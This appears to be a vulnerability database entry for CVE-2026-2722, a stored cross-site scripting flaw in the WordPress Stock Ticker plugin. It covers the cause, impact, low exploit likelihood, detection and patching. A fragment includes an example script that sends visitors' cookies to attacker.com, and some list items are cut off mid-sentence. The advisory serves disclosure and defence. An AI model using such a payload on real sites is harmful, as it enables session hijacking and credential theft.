
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2722 is a Stored Cross-Site Scripting (XSS) vulnerability in the Stock Ticker plugin for WordPress, affecting all versions up to and including 3.26.1. The flaw stems from insufficient input sanitization and output escaping in admin settings, allowing authenticated attackers with administrator-level permissions to inject arbitrary web scripts into pages. The vulnerability is limited in scope, affecting only multi-site WordPress installations or those where unfiltered_html has been disabled. It was published on March 7, 2026, with a CVSS v3.1 base score of 4.8 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability exists in the plugin's settings class (class-wpau-stock-ticker-settings.php, around line 810), where admin-supplied input is neither properly sanitized on input nor escaped on output, allowing script injection via the WordPress admin panel. Exploitation requires an authenticated session with administrator-level privileges, and the injected script executes in the context of any user who visits an affected page. The vulnerable code is publicly browsable in the WordPress plugin repository (WordPress Trac, EUVD).
Successful exploitation allows an attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of any user visiting those pages. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The confidentiality and integrity impacts are low, and there is no direct availability impact; however, in multi-site environments, the blast radius may extend across multiple sub-sites (Wordfence, EUVD).
The vulnerability requires high privileges (administrator-level) and user interaction (a victim must visit the injected page), significantly limiting its exploitability. The EPSS score is approximately 0.021% (0.000210), indicating a very low probability of exploitation in the wild. No evidence of active in-the-wild exploitation, exploit kits, or threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, Red Hat CVE).
unfiltered_html disabled that is running the Stock Ticker plugin version ≤ 3.26.1.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable admin settings field that lacks proper sanitization.<script> tags or JavaScript event handlers (e.g., onerror, onload) in the wp_options table entries associated with the Stock Ticker plugin (stock_ticker_* option keys)./wp-content/plugins/stock-ticker/).Users should update the Stock Ticker plugin to a version beyond 3.26.1 that includes the fix introduced in changeset 3474252. The patch can be reviewed in the WordPress plugin repository changeset. As a temporary workaround, administrators can restrict access to the plugin's settings page to trusted accounts only, or temporarily deactivate the plugin on affected installations. Ensuring unfiltered_html remains disabled (the default for non-super-admins on multi-site) provides an additional layer of defense (Wordfence, WordPress Trac).
The vulnerability was discovered and disclosed by Wordfence, which assigned it a medium severity rating consistent with the constrained exploitation conditions. Coverage has been limited to automated vulnerability tracking platforms and security feeds, with no notable researcher commentary or significant media coverage beyond standard CVE publication channels (Wordfence, EUVD).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."